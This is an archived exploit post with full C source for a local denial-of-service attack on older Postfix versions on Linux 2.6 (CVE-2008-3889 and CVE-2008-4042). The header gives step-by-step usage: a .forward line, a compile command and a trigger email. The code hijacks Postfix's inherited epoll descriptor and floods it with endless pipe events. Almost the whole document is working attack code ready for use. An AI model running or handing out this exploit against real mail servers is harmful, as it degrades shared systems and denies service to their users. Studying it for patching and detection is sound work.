
Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit


No description provided by source.


                                                /*
 * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c
 * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c
 *
 * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 
 * before 2.6-20080902, when used with the Linux 2.6 kernel.
 *
 * CVE-2008-3889 & CVE-2008-4042
 *
 * by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
 * and Marc Morata Fité <marc.morata.fite[at]gmail[dot]com>
 * 2008-09-16
 *
 * This proof of concept creates a pipe and registers it in the epoll
 * instance whose descriptor Postfix leaves open in the process that runs
 * the .forward command (the program finds it by scanning /proc/<pid>/fd for
 * a link whose target contains "eventpoll").
 * Once the pipe is registered, an endless write/read loop generates a
 * continuous stream of events for the local and master Postfix processes,
 * which slows the whole system down considerably.
 *
 * Example of use:
 * 1- Put the line "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with
 * the double quotes) in the file ~/.forward
 *
 * 2- Compile the exploit and put the resulting binary in your home
 * directory (the same source is published under both CVE names above):
 * gcc CVE-2008-3889-exploit.c -o ~/CVE-2008-3889-exploit
 *
 * 3- Send an email to the user
 *
 * The output is written to /tmp/postfix.log
 */


#include <dirent.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Number of extra dup()s of the pipe's read end registered per epoll instance found. */
enum { FDOPEN = 200 };


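/*
 * Register fd in the epoll instance fde for every event type, edge-triggered,
 * so that any activity on fd produces an event for whoever owns fde.
 *
 * fde: descriptor of the epoll instance (the one inherited from Postfix that
 *      main() locates under /proc/<pid>/fd).
 * fd:  descriptor to register; main() passes the read end of its pipe and
 *      dup()s of it.
 *
 * Returns 0 on success and -1 if epoll_ctl() failed; errno is preserved
 * across the diagnostic printf() so the caller can inspect it. Callers may
 * ignore the result, as they did when this function returned void.
 */
int add_fd(int fde, int fd) {
	printf("[*] Adding fd %d to eventpoll %d\n", fd, fde);

	/*
	 * Automatic storage: the original used 'static', which only shared
	 * scratch state between calls for no benefit. ev.data is a union, so a
	 * single assignment suffices (the original wrote u32 and then u64, the
	 * second overwriting the first). The value itself is arbitrary: this
	 * program never calls epoll_wait() on fde and so never reads it back.
	 */
	struct epoll_event ev = {
		.events = EPOLLIN | EPOLLOUT | EPOLLPRI | EPOLLERR | EPOLLHUP | EPOLLET,
		.data.u64 = 6,
	};

	if (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) != 0) {
		int saved = errno;	/* printf() may clobber errno */
		printf(" => Error (%d) adding fd %d\n", saved, fd);
		errno = saved;
		return -1;
	}
	printf(" => Fd %d added!\n", fd);
	return 0;
}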

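/*
 * Entry point. Scans this process's own descriptor table (/proc/<pid>/fd)
 * for an inherited epoll instance, registers the read end of a fresh pipe
 * in every such instance (plus FDOPEN dup()s of it), and then loops forever
 * writing and reading one byte so that the epoll owner keeps receiving
 * events.
 *
 * argc/argv are unused: the program is meant to be started from a .forward
 * line (see the header comment), not with options.
 *
 * Returns 1 when pipe() or opendir() fails before the scan, and 0 when no
 * epoll descriptor was found (the original exit status is kept here; a
 * non-zero status would presumably make the delivering MTA treat the
 * .forward command as failed -- confirm before changing). Never returns
 * once flooding has started.
 */
int main(int argc, char *argv[]) {
	(void)argc;
	(void)argv;

	int fds[2];
	if (pipe(fds) != 0) {
		printf("[!] pipe() failed (errno %d)\n", errno);
		return 1;
	}

	char dir[32];
	int len = snprintf(dir, sizeof dir, "/proc/%d/fd", (int)getpid());
	if (len < 0 || (size_t)len >= sizeof dir) {
		printf("[!] Cannot build the /proc path\n");
		return 1;
	}
	printf("[*] Opening directory %s\n", dir);
	DIR *fd_dir = opendir(dir);
	if (fd_dir == NULL) {
		/* The original passed NULL on to readdir() and crashed here. */
		printf("[!] Cannot open %s (errno %d)\n", dir, errno);
		return 1;
	}

	/* We are looking for the eventpoll file descriptor. */
	int found = 0;
	struct dirent *de;
	while ((de = readdir(fd_dir)) != NULL) {
		/* Only numeric names are descriptors; this also skips "." and "..". */
		errno = 0;
		char *end;
		long epfd = strtol(de->d_name, &end, 10);
		if (end == de->d_name || *end != '\0' || errno == ERANGE
		    || epfd < 0 || epfd > INT_MAX) {
			continue;
		}

		char link_f[256];
		len = snprintf(link_f, sizeof link_f, "%s/%s", dir, de->d_name);
		if (len < 0 || (size_t)len >= sizeof link_f) {
			continue;
		}

		/* readlink() does not NUL-terminate: reserve a byte and add it. */
		char link_d[256];
		ssize_t n = readlink(link_f, link_d, sizeof link_d - 1);
		if (n < 0) {
			continue;
		}
		link_d[n] = '\0';
		if (strstr(link_d, "eventpoll") == NULL) {
			continue;
		}

		found = 1;
		printf(" => %s points to %s\n", de->d_name, link_d);
		add_fd((int)epfd, fds[0]);
		/*
		 * Register FDOPEN dup()s of the same read end as well; the original
		 * note says this lets "more than one triggered event at once" be
		 * tested. Stop at the first dup() failure (typically the fd limit)
		 * instead of feeding -1 to add_fd() for every remaining iteration.
		 */
		for (int i = 0; i < FDOPEN; i++) {
			int dupfd = dup(fds[0]);
			if (dupfd < 0) {
				printf(" => dup() failed after %d copies (errno %d)\n", i, errno);
				break;
			}
			add_fd((int)epfd, dupfd);
		}
	}
	closedir(fd_dir);

	if (found == 0) {
		printf("[!] Are you sure that your postfix is vulnerable?\n");
		printf("[!] Are you launching me through a .forward file?\n");
		exit(0);
	}

	printf("[*] Starting to flood the system!\n");
	fflush(stdout);
	close(0);
	close(1);
	close(2);

	/*
	 * Each write makes the pipe readable and each read drains it again, so
	 * every iteration produces events on all registered descriptors. Return
	 * values are deliberately ignored: a failed call only costs one
	 * iteration, and the loop is meant never to end.
	 */
	char c;
	for (;;) {
		write(fds[1], "A", 1);
		read(fds[0], &c, 1);
	}
}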

// milw0rm.com [2008-09-16]